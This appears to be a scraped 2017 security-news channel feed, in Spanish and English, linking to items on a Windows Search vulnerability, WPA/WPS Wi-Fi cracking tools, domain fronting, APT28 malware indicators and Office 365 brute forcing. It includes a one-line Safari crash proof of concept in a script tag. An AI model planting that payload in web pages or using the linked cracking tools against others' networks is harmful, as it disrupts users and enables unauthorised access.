CVE-2017-8620: Windows Search Remote Code Execution Vulnerability
⚠️Disable WSearch service now!
https://portal.msrc.microsoft.com/en-US/eula
⚠️Disable WSearch service now!
https://portal.msrc.microsoft.com/en-US/eula
Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat
https://github.com/brannondorsey/wifi-cracking
https://github.com/brannondorsey/wifi-cracking
GitHub
GitHub - brannondorsey/wifi-cracking: Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat
Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat - brannondorsey/wifi-cracking
Chat de tpx Security.
Las reglas son simples, el chat es para compartir conocimiento, preguntas, dudas de temas de CiberSeguridad y otras existenciales !!
+ No Porno
+ No Insultar (serás baneado)
https://t.me/tpxChat
Las reglas son simples, el chat es para compartir conocimiento, preguntas, dudas de temas de CiberSeguridad y otras existenciales !!
+ No Porno
+ No Insultar (serás baneado)
https://t.me/tpxChat
Some Chinese USB adapters have a hidden SIM that will send a text message with GPS coordinates to track an unknowing victim…
https://twitter.com/wk_tyn/status/894789440584929281
https://twitter.com/wk_tyn/status/894789440584929281
Twitter
若ちゃん
中国のUSB充電アダプター型盗聴器が先進的すぎる。 充電器の上のふたを開けると、なんとSIMスロットがある。 SIMカードを挿入した状態で、このSIMカードの電話番号宛にSMSを送ると、コールバックし、これに出ると盗聴できる仕様。 もちろんGPS機能付きである。
SSL Domain Fronting 101
If you’re new to the domain fronting concept, I suggest you start by reading Simplifying Domain Fronting .
http://www.rvrsh3ll.net/blog/offensive/ssl-domain-fronting-101/
If you’re new to the domain fronting concept, I suggest you start by reading Simplifying Domain Fronting .
http://www.rvrsh3ll.net/blog/offensive/ssl-domain-fronting-101/
TUTELAGE: Malware Defense Infrastructure (NSA/CSS)
https://www.slideshare.net/kibyesUn/nsa-css-tutelage
#tutelage #malware
https://www.slideshare.net/kibyesUn/nsa-css-tutelage
#tutelage #malware
Tracking terrorists online might invade your #privacy
http://www.bbc.com/future/story/20170808-tracking-terrorists-online-might-invade-your-privacy
http://www.bbc.com/future/story/20170808-tracking-terrorists-online-might-invade-your-privacy
WPScripts
Coleccion de Scripts para auditar redes WiFi con el Protocolo WPS activo
https://github.com/0x90/wps-scripts
Enviado por @Drok3r
Coleccion de Scripts para auditar redes WiFi con el Protocolo WPS activo
https://github.com/0x90/wps-scripts
Enviado por @Drok3r
GitHub
GitHub - 0x90/wps-scripts: WPS hacking scripts
WPS hacking scripts. Contribute to 0x90/wps-scripts development by creating an account on GitHub.
Malicious code written into DNA infects the computer that reads it
https://techcrunch.com/2017/08/09/malicious-code-written-into-dna-infects-the-computer-that-reads-it/amp/
https://techcrunch.com/2017/08/09/malicious-code-written-into-dna-infects-the-computer-that-reads-it/amp/
How to Calculate Network Addresses with ipcalc
https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc
https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc
Pafish - Tool to Detect Sandboxes and Analysis Environments in the Same Way as… https://github.com/a0rtega/pafish #Malware #MalwareAnalysis
New Type of Brute Force Attack on Office 365 Accounts
Sophisticated and coordinated hackers are constantly adapting and using innovative techniques to gain unauthorized access to corporate data. Recently, 48 Office 365 customers experienced exactly this kind of threat where an attacker implemented a new strategy to try to access high-level information.
The brute force login attack was unique in that it was directed against a few key targets across multiple companies instead of casting a wider net against as many users as possible. There were 100,000 failed-login attempts originating from 67 IPs and 12 networks over a period of nearly 7 months.
https://www.tripwire.com/state-of-security/featured/new-type-brute-force-attack-office-365-accounts/
Sophisticated and coordinated hackers are constantly adapting and using innovative techniques to gain unauthorized access to corporate data. Recently, 48 Office 365 customers experienced exactly this kind of threat where an attacker implemented a new strategy to try to access high-level information.
The brute force login attack was unique in that it was directed against a few key targets across multiple companies instead of casting a wider net against as many users as possible. There were 100,000 failed-login attempts originating from 67 IPs and 12 networks over a period of nearly 7 months.
https://www.tripwire.com/state-of-security/featured/new-type-brute-force-attack-office-365-accounts/
APT28 Targets Hospitality Sector, Presents Threat to Travelers.
The malicious document – Hotel_Reservation_Form.doc (MD5: 9b10685b774a783eabfecdb6119a8aa3), as seen in Figure 1 – contains a macro that base64 decodes a dropper that then deploys APT28’s signature GAMEFISH malware (MD5: 1421419d1be31f1f9ea60e8ed87277db), which uses mvband.net and mvtband.net as command and control (C2) domains.
https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html
The malicious document – Hotel_Reservation_Form.doc (MD5: 9b10685b774a783eabfecdb6119a8aa3), as seen in Figure 1 – contains a macro that base64 decodes a dropper that then deploys APT28’s signature GAMEFISH malware (MD5: 1421419d1be31f1f9ea60e8ed87277db), which uses mvband.net and mvtband.net as command and control (C2) domains.
https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html
FireEye
APT28 Targets Hospitality Sector, Presents Threat to Travelers
The hospitality sector is being actively targeted in a campaign that FireEye attributes with moderate confidence to APT28.
Safari null ptr crash:
<script>var s = new window.webkitOfflineAudioContext(2,44100*0x41414141, 44100);</script>
<script>var s = new window.webkitOfflineAudioContext(2,44100*0x41414141, 44100);</script>
RUSSIA'S 'FANCY BEAR' HACKERS USED LEAKED NSA TOOL TO TARGET HOTEL GUESTS.
https://www.wired.com/story/fancy-bear-hotel-hack/
https://www.wired.com/story/fancy-bear-hotel-hack/
Ad blocking is under attack!
Well, this is huge, so I'd like to draw your attention to what's happening right now. This is a very alarming case, and it concerns every ad blocker user.
https://blog.adguard.com/en/ad-blocking-is-under-attack/
Well, this is huge, so I'd like to draw your attention to what's happening right now. This is a very alarming case, and it concerns every ad blocker user.
https://blog.adguard.com/en/ad-blocking-is-under-attack/
Attacking Self-Hosted Skype for Business/Microsoft Lync Installations
https://www.trustedsec.com/2017/08/attacking-self-hosted-skype-businessmicrosoft-lync-installations/
https://www.trustedsec.com/2017/08/attacking-self-hosted-skype-businessmicrosoft-lync-installations/
TrustedSec
Cybersecurity Education from the Experts | TrustedSec Blog Posts
Learn more about how to safeguard your company through our educational blog posts on everything from updated tech to the newest scams infiltrating organizations today.
Vehículos autónomos hackeados con falsas señales de tráfico
Cada día somos testigos de nuevos avances en la conducción autónoma de vehículos. Muchas empresas presentan prototipos y algunos incluso ya lo tienen en producción como Tesla autopilot. Estos vehículos son capaces de analizar el entorno que les rodea y de esa forma conducir por ellos mismos, sin intervención humana alguna.
http://www.elladodelmal.com/2017/08/vehiculos-autonomos-hackeados-con.html
Cada día somos testigos de nuevos avances en la conducción autónoma de vehículos. Muchas empresas presentan prototipos y algunos incluso ya lo tienen en producción como Tesla autopilot. Estos vehículos son capaces de analizar el entorno que les rodea y de esa forma conducir por ellos mismos, sin intervención humana alguna.
http://www.elladodelmal.com/2017/08/vehiculos-autonomos-hackeados-con.html